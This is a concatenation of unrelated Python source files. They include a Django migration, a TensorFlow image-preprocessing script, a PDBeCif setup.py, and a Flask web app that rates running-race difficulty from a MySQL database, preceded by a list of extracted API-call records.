... | [((2269, 2324), 'django.db.models.signals.post_save.connect', 'post_save.connect', (['notify_assignment'], {'sender': 'Assignment'}), '(notify_assignment, sender=Assignment)\n', (2286, 2324), False, 'from django.db.models.signals import post_save\n'), ((491, 520), 'django.db.models.SlugField', 'models.SlugField', ([], {'unique': '(True)'}), '(unique=True)\n', (507, 520), False, 'from django.db import models\n'), ((533, 564), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(50)'}), '(max_length=50)\n', (549, 564), False, 'from django.db import models\n'), ((581, 614), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(True)'}), '(default=True)\n', (600, 614), False, 'from django.db import models\n'), ((645, 673), 'django.db.models.FloatField', 'models.FloatField', ([], {'default': '(0)'}), '(default=0)\n', (662, 673), False, 'from django.db import models\n'), ((689, 705), 'django.db.models.Manager', 'models.Manager', ([], {}), '()\n', (703, 705), False, 'from django.db import models\n'), ((887, 956), 'django.db.models.ForeignKey', 'models.ForeignKey', (['settings.AUTH_USER_MODEL'], {'on_delete': 'models.CASCADE'}), '(settings.AUTH_USER_MODEL, on_delete=models.CASCADE)\n', (904, 956), False, 'from django.db import models\n'), ((969, 1023), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(10)', 'blank': '(True)', 'null': '(True)'}), '(max_length=10, blank=True, null=True)\n', (985, 1023), False, 'from django.db import models\n'), ((1040, 1094), 'django.db.models.ForeignKey', 'models.ForeignKey', (['Treatment'], {'on_delete': 'models.CASCADE'}), '(Treatment, on_delete=models.CASCADE)\n', (1057, 1094), False, 'from django.db import models\n'), ((1115, 1154), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'auto_now_add': '(True)'}), '(auto_now_add=True)\n', (1135, 1154), False, 'from django.db import models\n'), ((1840, 1893), 'django.contrib.contenttypes.models.ContentType.objects.get_for_model', 'ContentType.objects.get_for_model', (['instance.__class__'], {}), '(instance.__class__)\n', (1873, 1893), False, 'from django.contrib.contenttypes.models import ContentType\n'), ((1904, 2005), 'django.urls.reverse', 'reverse', (["('admin:%s_%s_change' % (content_type.app_label, content_type.model))"], {'args': '(instance.pk,)'}), "('admin:%s_%s_change' % (content_type.app_label, content_type.model),\n args=(instance.pk,))\n", (1911, 2005), False, 'from django.urls import reverse\n'), ((2186, 2274), 'config.utils.notify_slack', 'notify_slack', (['("""*New assignment!* %s \n Stats: %s \n""" % (instance, stats_text))', 'url'], {}), '("""*New assignment!* %s \n Stats: %s \n""" % (instance,\n stats_text), url)\n', (2198, 2274), False, 'from config.utils import notify_slack\n'), ((2379, 2448), 'django.db.models.ForeignKey', 'models.ForeignKey', (['settings.AUTH_USER_MODEL'], {'on_delete': 'models.CASCADE'}), '(settings.AUTH_USER_MODEL, on_delete=models.CASCADE)\n', (2396, 2448), False, 'from django.db import models\n'), ((2470, 2505), 'django.db.models.DateField', 'models.DateField', ([], {'auto_now_add': '(True)'}), '(auto_now_add=True)\n', (2486, 2505), False, 'from django.db import models\n'), ((2527, 2548), 'django.db.models.IntegerField', 'models.IntegerField', ([], {}), '()\n', (2546, 2548), False, 'from django.db import models\n'), ((2572, 2593), 'django.db.models.IntegerField', 'models.IntegerField', ([], {}), '()\n', (2591, 2593), False, 'from django.db import models\n'), ((2614, 2635), 'django.db.models.IntegerField', 'models.IntegerField', ([], {}), '()\n', (2633, 2635), False, 'from django.db import models\n'), ((2660, 2681), 'django.db.models.IntegerField', 'models.IntegerField', ([], {}), '()\n', (2679, 2681), False, 'from django.db import models\n'), ((2705, 2759), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(10)', 'blank': '(True)', 'null': '(True)'}), '(max_length=10, blank=True, null=True)\n', (2721, 2759), False, 'from django.db import models\n'), ((2771, 2802), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(10)'}), '(max_length=10)\n', (2787, 2802), False, 'from django.db import models\n'), ((2813, 2844), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(10)'}), '(max_length=10)\n', (2829, 2844), False, 'from django.db import models\n'), ((2862, 2893), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(10)'}), '(max_length=10)\n', (2878, 2893), False, 'from django.db import models\n'), ((4038, 4107), 'django.db.models.ForeignKey', 'models.ForeignKey', (['settings.AUTH_USER_MODEL'], {'on_delete': 'models.CASCADE'}), '(settings.AUTH_USER_MODEL, on_delete=models.CASCADE)\n', (4055, 4107), False, 'from django.db import models\n'), ((4129, 4164), 'django.db.models.DateField', 'models.DateField', ([], {'auto_now_add': '(True)'}), '(auto_now_add=True)\n', (4145, 4164), False, 'from django.db import models\n'), ((4186, 4207), 'django.db.models.IntegerField', 'models.IntegerField', ([], {}), '()\n', (4205, 4207), False, 'from django.db import models\n'), ((4228, 4249), 'django.db.models.IntegerField', 'models.IntegerField', ([], {}), '()\n', (4247, 4249), False, 'from django.db import models\n'), ((4273, 4294), 'django.db.models.IntegerField', 'models.IntegerField', ([], {}), '()\n', (4292, 4294), False, 'from django.db import models\n'), ((4313, 4343), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(3)'}), '(max_length=3)\n', (4329, 4343), False, 'from django.db import models\n'), ((3713, 3721), 'random.random', 'random', ([], {}), '()\n', (3719, 3721), False, 'from random import random\n')] |
from typing import Optional
from Core.ConfigHandler import ConfigHandler
from FlexioFlow.Options import Options
from FlexioFlow.StateHandler import StateHandler
from VersionControlProvider.Issuer import Issuer
from VersionControlProvider.IssuerFactory import IssuerFactory
from VersionControlProvider.Issuers import Issuers
class IssuerHandler:
def __init__(self, state_handler: StateHandler, config_handler: ConfigHandler,options: Options):
self.state_handler: StateHandler = state_handler
self.config_handler: ConfigHandler = config_handler
self.options: Options = options
def issuer(self) -> Optional[Issuer]:
issuers: Issuers = Issuers.GITHUB
issuer = None
try:
issuer: Issuer = IssuerFactory.build(self.state_handler, self.config_handler, issuers,self.options)
except ValueError:
print('Can\'t get Issuer')
finally:
return issuer
| [
"VersionControlProvider.IssuerFactory.IssuerFactory.build"
] | [((756, 844), 'VersionControlProvider.IssuerFactory.IssuerFactory.build', 'IssuerFactory.build', (['self.state_handler', 'self.config_handler', 'issuers', 'self.options'], {}), '(self.state_handler, self.config_handler, issuers, self.\n options)\n', (775, 844), False, 'from VersionControlProvider.IssuerFactory import IssuerFactory\n')] |
import tensorflow as tf
import numpy as np
import os
import imageio
from utils import get_shardsize, get_zeros_array
def resize(image, target_shape):
imdtype = image.dtype
with tf.device('/CPU:0'):
image = tf.image.resize(image, target_shape[:2]).numpy()
assert image.shape == target_shape
return image.astype(imdtype)
def fit_image(image, target_shape, fit_method):
assert isinstance(image, np.ndarray), "Image must be numpy array"
assert len(image.shape) == 3 and image.shape[-1] == 3, "Original Image shape must be of shape (H, W, 3)."
assert len(target_shape) == 3 and target_shape[-1] == 3, "Desired Image shape must be of shape (H, W, 3)."
assert fit_method in ['resize', 'center_crop', 'random_crop'], "Crop method must be one of 'resize', 'center_crop' or 'random_crop' "
(h, w, _), (htar, wtar, _) = image.shape, target_shape
if image.shape == target_shape:
return image
if h < htar or w < wtar:
if fit_method != 'resize':
print("Your selected fit method is {} but your desired image shape is larger than the given image's shape. Using resize instead - note that this may change the image aspect ratio.".format(fit_method), end="\r")
return resize(image, target_shape)
if fit_method == 'resize':
return resize(image, target_shape)
elif fit_method == 'center_crop':
trim_h = int((h - htar)/2)
trim_w = int((w - wtar)/2)
image = image[trim_h:h-trim_h, trim_w:w-trim_w]
if image.shape[0] != htar:
image = image[:-1]
if image.shape[1] != wtar:
image = image[:, :-1]
assert image.shape == target_shape, image.shape
return image
elif fit_method == 'random_crop':
imdtype = image.dtype
with tf.device('/CPU:0'):
image = tf.image.random_crop(tf.constant(image), target_shape).numpy()
assert image.shape == target_shape
return image.astype(imdtype)
def images_to_train_dataset(writedir, datadir, target_shape, fit_method='resize'):
'''
writedir: specifies the folder where numpy arrays are created
datadir: specifies the folder where the jpg/png files in the dataset are located
target_shape: the desired shape of the images
fit_method: how to adjust images such that they are of the same shape as target_shape. must be 'resize', 'center_crop' or 'random_crop'
remove_datadir: whether or not to delete the original dataset
returns: the number of training examples.
'''
if len(os.listdir(datadir)) == 0:
raise RuntimeError("No training images were found. Data directory should not be empty. ")
elif os.path.isfile(datadir):
raise RuntimeError("data directory should not be a file, it should be a folder. You may have to unzip your files to a new folder.")
if os.path.isfile(writedir):
raise RuntimeError("The directory you want to write to is an existing file.")
elif writedir == datadir:
raise RuntimeError("The numpy arrays should be written to a different directory than the original.")
elif os.path.isdir(writedir):
if len(os.listdir(writedir)) != 0:
print("Files already exist in this directory. Will use these for training.")
return len(os.listdir(writedir))
else:
os.mkdir(writedir)
shard_size = get_shardsize(target_shape)
numpy_dataset = get_zeros_array(target_shape)
tmp_numpy = get_zeros_array(target_shape) #appends to numpy_dataset in groups of size 50. this is faster.
count = 0
files_written = 0
for impath in sorted(os.listdir(datadir)):
impath = os.path.join(datadir, impath)
try:
image = imageio.imread(impath)
except:
continue #cant be converted to numpy array.
image = fit_image(image, target_shape, fit_method)
assert len(image.shape) == 3
image = np.expand_dims(image, axis=0)
count += 1
tmp_numpy = np.concatenate((tmp_numpy, image), axis=0)
if tmp_numpy.shape[0]%64 == 0:
numpy_dataset = np.concatenate((numpy_dataset, tmp_numpy))
tmp_numpy = get_zeros_array(target_shape)
if numpy_dataset.shape[0] >= shard_size:
data_to_write, remaining_data = numpy_dataset[:shard_size], numpy_dataset[shard_size:]
print(data_to_write.shape, remaining_data.shape)
writepath = os.path.join(writedir, 'data_{}.npy'.format(files_written))
np.save(writepath, data_to_write)
files_written += 1
numpy_dataset = remaining_data
numpy_dataset = np.concatenate((numpy_dataset, tmp_numpy))
writepath = os.path.join(writedir, 'data_{}.npy'.format(files_written))
if numpy_dataset.shape[0] != 0:
np.save(writepath, numpy_dataset)
files_written += 1
print("A maximum of %d images will be used in training." % count)
return count
| [
"tensorflow.device",
"os.listdir",
"imageio.imread",
"tensorflow.image.resize",
"os.path.join",
"os.path.isfile",
"os.path.isdir",
"tensorflow.constant",
"os.mkdir",
"numpy.concatenate",
"numpy.expand_dims",
"utils.get_zeros_array",
"utils.get_shardsize",
"numpy.save"
] | [((2888, 2912), 'os.path.isfile', 'os.path.isfile', (['writedir'], {}), '(writedir)\n', (2902, 2912), False, 'import os\n'), ((3406, 3433), 'utils.get_shardsize', 'get_shardsize', (['target_shape'], {}), '(target_shape)\n', (3419, 3433), False, 'from utils import get_shardsize, get_zeros_array\n'), ((3454, 3483), 'utils.get_zeros_array', 'get_zeros_array', (['target_shape'], {}), '(target_shape)\n', (3469, 3483), False, 'from utils import get_shardsize, get_zeros_array\n'), ((3500, 3529), 'utils.get_zeros_array', 'get_zeros_array', (['target_shape'], {}), '(target_shape)\n', (3515, 3529), False, 'from utils import get_shardsize, get_zeros_array\n'), ((4678, 4720), 'numpy.concatenate', 'np.concatenate', (['(numpy_dataset, tmp_numpy)'], {}), '((numpy_dataset, tmp_numpy))\n', (4692, 4720), True, 'import numpy as np\n'), ((186, 205), 'tensorflow.device', 'tf.device', (['"""/CPU:0"""'], {}), "('/CPU:0')\n", (195, 205), True, 'import tensorflow as tf\n'), ((2715, 2738), 'os.path.isfile', 'os.path.isfile', (['datadir'], {}), '(datadir)\n', (2729, 2738), False, 'import os\n'), ((3657, 3676), 'os.listdir', 'os.listdir', (['datadir'], {}), '(datadir)\n', (3667, 3676), False, 'import os\n'), ((3696, 3725), 'os.path.join', 'os.path.join', (['datadir', 'impath'], {}), '(datadir, impath)\n', (3708, 3725), False, 'import os\n'), ((3966, 3995), 'numpy.expand_dims', 'np.expand_dims', (['image'], {'axis': '(0)'}), '(image, axis=0)\n', (3980, 3995), True, 'import numpy as np\n'), ((4036, 4078), 'numpy.concatenate', 'np.concatenate', (['(tmp_numpy, image)'], {'axis': '(0)'}), '((tmp_numpy, image), axis=0)\n', (4050, 4078), True, 'import numpy as np\n'), ((4850, 4883), 'numpy.save', 'np.save', (['writepath', 'numpy_dataset'], {}), '(writepath, numpy_dataset)\n', (4857, 4883), True, 'import numpy as np\n'), ((2581, 2600), 'os.listdir', 'os.listdir', (['datadir'], {}), '(datadir)\n', (2591, 2600), False, 'import os\n'), ((3148, 3171), 'os.path.isdir', 'os.path.isdir', (['writedir'], {}), '(writedir)\n', (3161, 3171), False, 'import os\n'), ((3759, 3781), 'imageio.imread', 'imageio.imread', (['impath'], {}), '(impath)\n', (3773, 3781), False, 'import imageio\n'), ((4146, 4188), 'numpy.concatenate', 'np.concatenate', (['(numpy_dataset, tmp_numpy)'], {}), '((numpy_dataset, tmp_numpy))\n', (4160, 4188), True, 'import numpy as np\n'), ((4213, 4242), 'utils.get_zeros_array', 'get_zeros_array', (['target_shape'], {}), '(target_shape)\n', (4228, 4242), False, 'from utils import get_shardsize, get_zeros_array\n'), ((4549, 4582), 'numpy.save', 'np.save', (['writepath', 'data_to_write'], {}), '(writepath, data_to_write)\n', (4556, 4582), True, 'import numpy as np\n'), ((223, 263), 'tensorflow.image.resize', 'tf.image.resize', (['image', 'target_shape[:2]'], {}), '(image, target_shape[:2])\n', (238, 263), True, 'import tensorflow as tf\n'), ((3369, 3387), 'os.mkdir', 'os.mkdir', (['writedir'], {}), '(writedir)\n', (3377, 3387), False, 'import os\n'), ((1814, 1833), 'tensorflow.device', 'tf.device', (['"""/CPU:0"""'], {}), "('/CPU:0')\n", (1823, 1833), True, 'import tensorflow as tf\n'), ((3188, 3208), 'os.listdir', 'os.listdir', (['writedir'], {}), '(writedir)\n', (3198, 3208), False, 'import os\n'), ((3328, 3348), 'os.listdir', 'os.listdir', (['writedir'], {}), '(writedir)\n', (3338, 3348), False, 'import os\n'), ((1876, 1894), 'tensorflow.constant', 'tf.constant', (['image'], {}), '(image)\n', (1887, 1894), True, 'import tensorflow as tf\n')] |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.4 on 2018-07-05 19:05
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('bot', '0025_auto_20180705_1839'),
]
operations = [
migrations.AddField(
model_name='pad',
name='agency_id',
field=models.IntegerField(default=1),
preserve_default=False,
),
]
| [
"django.db.models.IntegerField"
] | [((395, 425), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'default': '(1)'}), '(default=1)\n', (414, 425), False, 'from django.db import migrations, models\n')] |
__author__ = "<NAME> (Protein Data Bank in Europe; http://pdbe.org)"
__date__ = "$17-Aug-2013 12:39:18$"
import os
from setuptools import setup, find_packages
def read(fname):
return open(os.path.join(os.path.dirname(__file__), fname)).read()
def get_version(rel_path):
for line in read(rel_path).splitlines():
if line.startswith("__version__"):
delim = '"' if '"' in line else "'"
return line.split(delim)[1]
raise RuntimeError("Unable to find version string.")
setup(
name="PDBeCif",
version=get_version("src/pdbecif/__init__.py"),
author="<NAME> (Protein Data Bank in Europe; PDBe)",
author_email="<EMAIL>",
test_suite="test",
include_package_data=True,
setup_requires=["pytest-runner"],
tests_require=["tox", "pytest>=3.2", "pytest-cov"],
package_dir={"": "src"},
packages=find_packages(
"src",
exclude=[
"*.test",
"*.test.*",
"test.*",
"test",
],
),
scripts=[],
url="http://pypi.python.org/pypi/PDBeCIF/",
license_file="LICENSE",
description="A lightweight pure python package for reading, writing and manipulating mmCIF files distributed by the wwPDB.",
project_urls={
"Source code": "https://github.com/PDBeurope/pdbecif",
"Documentation": "https://pdbeurope.github.io/pdbecif/",
},
long_description=read("README.md"),
long_description_content_type="text/markdown",
classifiers=[
"License :: OSI Approved :: GNU General Public License v3 (GPLv3)",
"Programming Language :: Python",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 2.6",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.2",
"Programming Language :: Python :: 3.3",
"Programming Language :: Python :: 3.4",
"Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: Implementation :: CPython",
"Programming Language :: Python :: Implementation :: PyPy",
"Operating System :: Unix",
"Operating System :: MacOS",
"Operating System :: POSIX",
"Intended Audience :: Science/Research",
"Intended Audience :: Developers",
"Topic :: Scientific/Engineering :: Bio-Informatics",
],
keywords="STAR CIF mmCIF PDB PDBe parsing parser API",
extras_require={
"tests": ["pytest", "pytest-cov", "tox"],
"docs": [
"sphinx",
"sphinx_rtd_theme",
"recommonmark",
"sphinx-autodoc-typehints",
"sphinx-markdown-tables",
],
},
) | [
"os.path.dirname",
"setuptools.find_packages"
] | [((869, 939), 'setuptools.find_packages', 'find_packages', (['"""src"""'], {'exclude': "['*.test', '*.test.*', 'test.*', 'test']"}), "('src', exclude=['*.test', '*.test.*', 'test.*', 'test'])\n", (882, 939), False, 'from setuptools import setup, find_packages\n'), ((208, 233), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (223, 233), False, 'import os\n')] |
import os
from channels.routing import ProtocolTypeRouter
from django.core.asgi import get_asgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "project.settings")
application = ProtocolTypeRouter(
{
"http": get_asgi_application(),
# Just HTTP for now. (We can add other protocols later.)
}
)
| [
"os.environ.setdefault",
"django.core.asgi.get_asgi_application"
] | [((110, 177), 'os.environ.setdefault', 'os.environ.setdefault', (['"""DJANGO_SETTINGS_MODULE"""', '"""project.settings"""'], {}), "('DJANGO_SETTINGS_MODULE', 'project.settings')\n", (131, 177), False, 'import os\n'), ((235, 257), 'django.core.asgi.get_asgi_application', 'get_asgi_application', ([], {}), '()\n', (255, 257), False, 'from django.core.asgi import get_asgi_application\n')] |
from bitarray import bitarray
from PIL import Image
image = Image.open('knowit_03.png')
red, *_ = image.split()
bits = [x & 1 for x in red.tobytes()]
#byte_string, *_ = bitarray(bits, endian='little').tobytes().partition(b'\0')
#result = byte_string.decode('ascii')
print(bitarray(bits, endian='little').tobytes()) | [
"PIL.Image.open",
"bitarray.bitarray"
] | [((61, 88), 'PIL.Image.open', 'Image.open', (['"""knowit_03.png"""'], {}), "('knowit_03.png')\n", (71, 88), False, 'from PIL import Image\n'), ((275, 306), 'bitarray.bitarray', 'bitarray', (['bits'], {'endian': '"""little"""'}), "(bits, endian='little')\n", (283, 306), False, 'from bitarray import bitarray\n')] |
from Statistics.ZScore import zscore
from Statistics.Mean import mean
from Statistics.StandardDeviation import standard_deviation
from Calculator.Subtraction import subtraction
from Calculator.Division import division
from Calculator.Multiplication import multiplication
from Calculator.Addition import addition
def population_correlation_coefficient(numbers, numbers1):
m = zscore(numbers)
n = zscore(numbers1)
value = list(map(lambda a, b: a * b, m, n))
p = division(len(value), sum(value))
return p
"""
x = mean(numbers)
y = mean(numbers1)
m = []
n = []
t = 0
for i in numbers:
zn = division(standard_deviation(numbers), subtraction(x, i))
m.append(zn)
for i in numbers1:
zm = division(standard_deviation(numbers1), subtraction(y, i))
n.append(zm)
for i in range(len(numbers)):
jk = multiplication(m[i], n[i])
t = addition(t, jk)
res = division(subtraction(1, len(numbers), t))
return res
""" | [
"Statistics.ZScore.zscore"
] | [((381, 396), 'Statistics.ZScore.zscore', 'zscore', (['numbers'], {}), '(numbers)\n', (387, 396), False, 'from Statistics.ZScore import zscore\n'), ((405, 421), 'Statistics.ZScore.zscore', 'zscore', (['numbers1'], {}), '(numbers1)\n', (411, 421), False, 'from Statistics.ZScore import zscore\n')] |
from flask import render_template, url_for, request, Flask
from app import app
import pandas as pd
from flaskext.mysql import MySQL
import matplotlib.pyplot as plt
from matplotlib.patches import Patch
plt.switch_backend('agg')
import numpy as np
import operator # sorting dictionary
import random
import string
############################################################
# Set up the database
#
mysql = MySQL()
app.config['MYSQL_DATABASE_USER'] = 'freddy'
app.config['MYSQL_DATABASE_PASSWORD'] = '<PASSWORD>'
app.config['MYSQL_DATABASE_DB'] = 'app'
app.config['MYSQL_DATABASE_HOST'] = 'localhost'
mysql.init_app(app)
conn = mysql.connect()
cur = conn.cursor()
########################################
conversion={'Mar': 26.219,
'10K': 6.214}
########################################
# Flask
@app.route('/')
@app.route('/index')
def index():
# We only have 2 race types, let's just hard code this for now:
return render_template("index.html", AllEvents=AllEvents)
@app.route('/about')
def about():
return render_template("about.html")
@app.route('/contact')
def contact():
return render_template("contact.html")
@app.route('/output')
def output():
sex_map = {'Female': 1, 'Male': 2}
age_map = {'U11':0,'U13':1,'U15':2,'U17':3,'U20':4,'U23':5,
'SEN':6,'V35':7,'V40':8,'V45':9,'V50':10,'V55':11,
'V60':12,'V65':13,'V70':14,'V75':15,'V80':16,'V85':17}
age_type = str(request.args.get('age'))
gender_type = str(request.args.get('gender'))
race_type = str(request.args.get('race'))
event_type = str(request.args.get('event'))
args = []
args.append(age_type)
args.append(gender_type)
args.append(race_type)
if not race_type:
return render_template("value_error.html", AllEvents=AllEvents)
if not event_type:
return render_template("value_error.html", AllEvents=AllEvents)
age_type = pd.Series(age_type)
gender_type = pd.Series(gender_type)
ID = int(pd.Series(event_type)[0])
# Build the appropriate material
age = age_type.map(age_map).astype(int)
sex = gender_type.map(sex_map).astype(int)
event = get_event(ID)
args.append(event)
#print('User Input:')
#print('\t age = {}'.format(age))
#print('\t sex = {}'.format(sex))
#print('\t race = {}'.format(race_type))
#print('\t ID = {}'.format(ID))
#print('\t Event = {}'.format(event))
time = get_time(ID, event, True)
gpx_info = get_gpx_info(ID, event, True)
gpx = gpx_info
gpx.append(time)
#print('Course Input:')
#print('\t time = {}'.format(time))
#print('\t sum_up = {}'.format(gpx_info[0]))
#print('\t sigma = {}'.format(gpx_info[1]))
#print('\t diff = {}'.format(gpx_info[2]))
beta = get_beta(race_type)
X = [age, sex, time, gpx_info[0], gpx_info[1],gpx_info[2]]
# Perform the dot product for our user:
betax = 0.0
for idx, val in enumerate(X):
betax += X[idx]*beta[idx]
#print(idx, X[idx], beta[idx])
# Relative Difficulty
score = get_score(float(betax), race_type)
# Course Difficulty
course_score = get_course_difficulty(beta, gpx, race_type)
#print('Rel, Course Difficulty', score, course_score)
# Plots for the output
name,name_gpx = build_plot(beta, gpx, race_type, ID)
name_score = build_S_curve(betax, score, race_type)
name_diff = build_time_diff_plot(race_type,ID,age,sex)
return render_template("output.html",
betax=betax, score=score, course_score=course_score,
event=event, beta=beta, args=args,
name=name,
name_gpx=name_gpx,
name_score=name_score,
name_diff=name_diff)
##################################################
# Remove sex/age dependence, average the result
def get_course_difficulty(beta, gpx, race_type):
scores = []
for age in range(0,18): # 0 -> 17
for sex in range(1,3): # 1 or 2, female or male
X = [age, sex, gpx[3], gpx[0], gpx[1], gpx[2]]
betax = 0.0
for idx in range(len(X)):
betax += X[idx] * beta[idx]
score = get_score(float(betax), race_type)
scores.append(score)
average = sum(scores) / len(scores)
return average
##################################################
# Build PLOTS
def build_S_curve(betax, score, race_type):
sql_select_query = """SELECT xval,yval FROM d_dist WHERE race_type = %s"""
cur.execute(sql_select_query, (str(race_type), ))
record = cur.fetchall()
xs, ys = [], []
for row in record:
xs.append(row[0])
ys.append(row[1]*10.0)
fig = plt.figure()
ax = plt.subplot(111)
ax.set_xlim(min(xs),max(xs))
ax.set_ylim(0.0,10.0)
ax.plot(xs, ys, 'r', linewidth=4.0)
score = 10.0*score
ax.plot([betax,betax],[0.0, score], c='black',linestyle='--')
ax.plot([betax,0.0],[score, score], c='black',linestyle='--')
plt.ylabel('Relative Difficulty', fontsize=16)
plt.xlabel('Score Distribution', fontsize=16)
plt.tight_layout()
rndstring = ''.join([random.choice(string.ascii_letters + string.digits) for n in range(10)])
name = 'app/static/images/plots/scores_{}.png'.format(str(rndstring))
plt.savefig(name)
plt.close(fig);
return name[3:]
def build_time_diff_plot(race_type,ID,age,sex):
Score, Time = [],[]
ThisScore,ThisTime=[],[]
for key,val in AllEvents[race_type].items():
time = get_time(key, val, True)
gpx_info = get_gpx_info(key, val, True)
beta = get_beta(race_type)
X = [age, sex, time, gpx_info[0], gpx_info[1],gpx_info[2]]
betax = 0.0
for idx, val in enumerate(X):
betax += X[idx]*beta[idx]
newscore = get_score(float(betax), race_type)
if key==ID:
ThisScore.append(newscore*10.0)
ThisTime.append(time)
else:
Score.append(newscore*10.0)
Time.append(time)
fig = plt.figure()
ax = plt.subplot(111)
plt.grid()
plt.scatter(Time,Score,c='black',s=30,marker='o',label='All Scores')
plt.scatter(ThisTime,ThisScore,c='red',s=40,marker='^',label='This Race')
ax.set_ylim(0.0,10.0)
avg = sum(Time)/len(Time)
ax.set_xlim(min(Time)-0.1*avg,max(Time)+0.1*avg)
plt.xlabel('Average Finish Time (min)',fontsize=15)
plt.ylabel('Relative Difficulty',fontsize=15)
plt.tight_layout()
rndstring = ''.join([random.choice(string.ascii_letters + string.digits) for n in range(10)])
name = 'app/static/images/plots/time_score_{}.png'.format(str(rndstring))
plt.savefig(name)
plt.close(fig);
return name[3:]
################################################################################
# Other methods to help output
#
def build_plot(beta, gpx, race_type, meeting_id):
labels = ['Age', 'Sex', 'Time', 'Elevation', 'Elevation \n Std. Dev.',
'Elevation \n Difference']
xint = range(len(labels))
palette = []
for i in beta:
if i <= 0:
palette.append('#b7040e')
else:
palette.append('#07a64c')
fig = plt.figure()
ax1 = plt.subplot2grid((2, 2), (0, 0), colspan=2)
plt.grid()
ax1.bar(xint, beta, width=1.0, color=palette)
plt.ylabel('Importance', fontsize=12)
plt.title('Regression Feature Importance')
plt.xticks(xint, labels, rotation=0, wrap=True)
plt.tight_layout()
# Let's get the averages for the gpx list for comparision
flags = ['sum_up', 'sigma', 'diff', 'min_time']
averages = []
for i in flags:
avg = get_avg(str(i), str(race_type))
averages.append(avg)
palette2 = ['#ff7f0e','#1f77b4']
ax2 = plt.subplot2grid((2, 2), (1, 0), colspan=1)
xint, vals = range(2), [gpx[3],averages[3]]
min_val = min(gpx[3],averages[3])
max_val = max(gpx[3],averages[3])
ax2.bar(xint,vals, width=1.0, color=palette2)
ax2.set_ylim(0.85*min_val, 1.15*max_val)
plt.ylabel('Finish Time (min)', fontsize=12)
plt.xticks(xint, ['Course \n Time', 'Average \n Time'], rotation=0, wrap=True)
legend_elements = [Patch(facecolor=palette2[0], label='Course Median Time'),
Patch(facecolor=palette2[1], label='{} Median Time'.format(race_type))]
ax2.legend(handles=legend_elements, loc='upper right', frameon=False)
plt.tight_layout()
bins, elevation = get_elevation_dict(meeting_id, race_type)
ax3 = plt.subplot2grid((2, 2), (1, 1), colspan=1)
ax3.plot(bins, elevation)
plt.ylabel('Course Elevation (m)', fontsize=12)
plt.xlabel('Distance (mi)', fontsize=10)
avg = sum(elevation)/len(elevation)
ax3.set_ylim(min(elevation) - 0.15*avg,
max(elevation) + 0.15*avg)
plt.tight_layout()
rndstring = ''.join([random.choice(string.ascii_letters + string.digits) for n in range(10)])
name = 'app/static/images/plots/features_{}.png'.format(str(rndstring))
plt.savefig(name)
# This is VERY TRICKY, sum_up has been normalized by distance BUT the difference
# feature has not. This is the correct way to handle this.
Dist = float(conversion[race_type])
sum_up = gpx[0]*Dist
sum_up_a = get_avg("sum_up",race_type)*Dist
diff = gpx[2]
diff_a = get_avg("diff",race_type)
sum_down = sum_up - diff
sum_down_a = sum_up_a - diff_a
#print(sum_up, sum_up_a, diff, diff_a, sum_down, sum_down_a, 'TESTING')
#print(gpx[0], sum_up)
# Part 2
labels_nice = ['Elev \n Gain', 'Avg Elev \n Gain', 'Elev \n Loss', 'Avg Elev \n Loss']
labels = ['1','2','3','4']
values = [sum_up, sum_up_a, sum_down, sum_down_a]
values = [x/Dist for x in values]
fig2 = plt.figure()
ax22 = plt.subplot(111)
palette3 = ['#ff7f0e','#1f77b4','#ff7f0e','#1f77b4']
ax22.barh(labels, values, align='center', color=palette3, height=1.0)
ax22.set_yticklabels(labels_nice)
ax22.invert_yaxis() # labels read top-to-bottom
ax22.set_xlabel('Elevation Gain/Loss Normalized by Distance (m/mi)')
plt.title("GPS Features")
name_gpx = 'app/static/images/plots/gpx_{}.png'.format(str(rndstring))
plt.grid()
plt.savefig(name_gpx)
plt.close(fig);
plt.close(fig2);
return [name[3:], name_gpx[3:]]
##################################################
# Done PLOTTING
##################################################
##################################################
# SQL TASKS
#
def sql_get_events(flag, unique=True):
sql_select_query = """SELECT meeting_id, event_title FROM race_info WHERE race_type = %s ORDER BY event_title"""
cur.execute(sql_select_query, (str(flag), ))
record = cur.fetchall()
events = {}
for row in record:
events[row[0]] = row[1]
if not unique:
return events
invert = {}
for k, v in events.items():
if v not in invert:
invert[v] = k
unique_events = {}
for k, v in invert.items():
unique_events[v] = k
return unique_events
def get_event(ID):
sql_select_query = """SELECT event_title FROM race_info WHERE meeting_id = %s"""
cur.execute(sql_select_query, (str(ID), ))
record = cur.fetchall()
return record[0][0]
def get_time(ID, event, use_event=True):
sql_select_query = """SELECT meeting_id, min_time FROM race_info WHERE event_title = %s"""
flag = str(event)
cur.execute(sql_select_query, (str(flag), ))
record = cur.fetchall()
#if len(record) > 1:
#print('{} has {} records => averaging times'.format(event,len(record)))
time_avg = 0.0
for row in record:
time_avg += row[1]
N = len(record)
time_avg /= N
return time_avg
def get_gpx_info(ID, event, use_event=True):
sql_select_query = """SELECT meeting_id, sum_up, sigma, diff FROM race_info WHERE meeting_id = %s"""
flag = str(ID)
if use_event:
sql_select_query = """SELECT meeting_id, sum_up, sigma, diff FROM race_info WHERE event_title = %s"""
flag = str(event)
cur.execute(sql_select_query, (str(flag), ))
record = cur.fetchall()
results = [0.0, 0.0, 0.0]
for row in record:
results[0] += row[1]
results[1] += row[2]
results[2] += row[3]
N = len(record)
results[0] /= N
results[1] /= N
results[2] /= N
#print('Found {0} records for {1}'.format(N, event))
return results
def get_beta(race):
sql_select_query = """SELECT age,sex,time,sum_up,sigma,diff FROM beta WHERE race_type = %s"""
